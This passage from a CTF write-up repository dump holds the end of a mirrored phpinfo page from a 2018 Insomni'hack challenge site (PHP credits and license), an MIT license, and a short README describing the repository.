718 | <tr><td class="e">Shared Memory Operations </td><td class="v">Slava Poliakov, Ilia Alshanetsky </td></tr>
719 | <tr><td class="e">SimpleXML </td><td class="v">Sterling Hughes, Marcus Boerger, Rob Richards </td></tr>
720 | <tr><td class="e">SNMP </td><td class="v">Rasmus Lerdorf, Harrie Hazewinkel, Mike Jackson, Steven Lawrance, Johann Hanne, Boris Lytochkin </td></tr>
721 | <tr><td class="e">SOAP </td><td class="v">Brad Lafountain, Shane Caraveo, Dmitry Stogov </td></tr>
722 | <tr><td class="e">Sockets </td><td class="v">Chris Vandomelen, Sterling Hughes, Daniel Beulshausen, Jason Greene </td></tr>
723 | <tr><td class="e">SPL </td><td class="v">Marcus Boerger, Etienne Kneuss </td></tr>
724 | <tr><td class="e">SQLite3 </td><td class="v">Scott MacVicar, Ilia Alshanetsky, Brad Dewar </td></tr>
725 | <tr><td class="e">SQLite 3.x driver for PDO </td><td class="v">Wez Furlong </td></tr>
726 | <tr><td class="e">System V Message based IPC </td><td class="v">Wez Furlong </td></tr>
727 | <tr><td class="e">System V Semaphores </td><td class="v">Tom May </td></tr>
728 | <tr><td class="e">System V Shared Memory </td><td class="v">Christian Cartus </td></tr>
729 | <tr><td class="e">tidy </td><td class="v">John Coggeshall, Ilia Alshanetsky </td></tr>
730 | <tr><td class="e">tokenizer </td><td class="v">Andrei Zmievski, Johannes Schlueter </td></tr>
731 | <tr><td class="e">WDDX </td><td class="v">Andrei Zmievski </td></tr>
732 | <tr><td class="e">XMLReader </td><td class="v">Rob Richards </td></tr>
733 | <tr><td class="e">xmlrpc </td><td class="v">Dan Libby </td></tr>
734 | <tr><td class="e">XML </td><td class="v">Stig Bakken, Thies C. Arntzen, Sterling Hughes </td></tr>
735 | <tr><td class="e">XMLWriter </td><td class="v">Rob Richards, Pierre-Alain Joye </td></tr>
736 | <tr><td class="e">XSL </td><td class="v">Christian Stocker, Rob Richards </td></tr>
737 | <tr><td class="e">Zip </td><td class="v">Pierre-Alain Joye, Remi Collet </td></tr>
738 | <tr><td class="e">Zlib </td><td class="v">Rasmus Lerdorf, Stefan Roehrich, Zeev Suraski, Jade Nicoletti, Michael Wallner </td></tr>
739 | </table>
740 | <table>
741 | <tr class="h"><th colspan="2">PHP Documentation</th></tr>
742 | <tr><td class="e">Authors </td><td class="v">Mehdi Achour, Friedhelm Betz, Antony Dovgal, Nuno Lopes, Hannes Magnusson, Philip Olson, Georg Richter, Damien Seguy, Jakub Vrana, Adam Harvey </td></tr>
743 | <tr><td class="e">Editor </td><td class="v">Peter Cowburn </td></tr>
744 | <tr><td class="e">User Note Maintainers </td><td class="v">Daniel P. Brown, Thiago Henrique Pojda </td></tr>
745 | <tr><td class="e">Other Contributors </td><td class="v">Previously active authors, editors and other contributors are listed in the manual. </td></tr>
746 | </table>
747 | <table>
748 | <tr class="h"><th>PHP Quality Assurance Team</th></tr>
749 | <tr><td class="e">Ilia Alshanetsky, Joerg Behrens, Antony Dovgal, Stefan Esser, Moriyoshi Koizumi, Magnus Maatta, Sebastian Nohn, Derick Rethans, Melvyn Sopacua, Jani Taskinen, Pierre-Alain Joye, Dmitry Stogov, Felipe Pena, David Soria Parra, Stanislav Malyshev, Julien Pauli, Stephen Zarkos, Anatol Belski, Remi Collet, Ferenc Kovacs </td></tr>
750 | </table>
751 | <table>
752 | <tr class="h"><th colspan="2">Websites and Infrastructure team</th></tr>
753 | <tr><td class="e">PHP Websites Team </td><td class="v">Rasmus Lerdorf, Hannes Magnusson, Philip Olson, Lukas Kahwe Smith, Pierre-Alain Joye, Kalle Sommer Nielsen, Peter Cowburn, Adam Harvey, Ferenc Kovacs, Levi Morrison </td></tr>
754 | <tr><td class="e">Event Maintainers </td><td class="v">Damien Seguy, Daniel P. Brown </td></tr>
755 | <tr><td class="e">Network Infrastructure </td><td class="v">Daniel P. Brown </td></tr>
756 | <tr><td class="e">Windows Infrastructure </td><td class="v">Alex Schoenmaker </td></tr>
757 | </table>
758 | <h2>PHP License</h2>
759 | <table>
760 | <tr class="v"><td>
761 | <p>
762 | This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file:  LICENSE
763 | </p>
764 | <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
765 | </p>
766 | <p>If you did not receive a copy of the PHP license, or have any questions about PHP licensing, please contact license@php.net.
767 | </p>
768 | </td></tr>
769 | </table>
770 | </div></body>
771 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/phpinfo.php by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:45 GMT -->
772 | </html>


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 xPowerz
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CTF-Writeups
2 | 
3 | This repo contains writeups for some challenges that I've solved in CTFs.
4 | 
5 | If you want to see writeups by other members of 0xBU, check out https://0xbu.com/writeups/
6 | 


--------------------------------------------------------------------------------